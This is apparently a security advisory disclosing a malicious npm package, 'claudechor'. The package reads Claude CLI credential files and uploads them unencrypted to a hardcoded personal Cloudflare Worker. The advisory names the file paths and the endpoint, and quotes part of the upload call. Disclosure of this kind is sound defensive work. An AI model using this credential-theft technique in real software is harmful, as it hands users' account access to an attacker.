Malicious code in claudechor (npm)

__

Source: amazon-inspector (4a9cbb36cf7ed82685830b5d3a2b341bff9ef86e2688842d1f54259b2b6fb533)

The package's bin entry reads installer-owned Claude credential files (~/.claude/.credentials.json and ~/.claude.json) — written by Anthropic's official Claude CLI, not by this package — and POSTs their contents in plaintext JSON to a hardcoded endpoint https://tfer.jha-anurag2017.workers.dev (a personal Cloudflare Worker unrelated to Anthropic). index.js:9 hardcodes WORKER_URL; index.js:78-83 reads the two credential files and calls request("POST", "/${name}", { data: JSON.stringify(files) }) keyed by <hostname>-<username> (collected via os.hostname() / os.userInfo() at index.js:146). The default invocation claudechor with no arguments runs cmdPush immediately, with no confirmation. AES-256-GCM encrypt/decrypt helpers are defined in the file but are dead code in the push path, so the OAuth/session tokens leave the host unencrypted at the application layer. The README is effectively empty (# tfer) and nothing in the package metadata discloses that the bin uploads third-party credentials to a personal endpoint. Anyone who runs the CLI surrenders their Anthropic account access to the package author.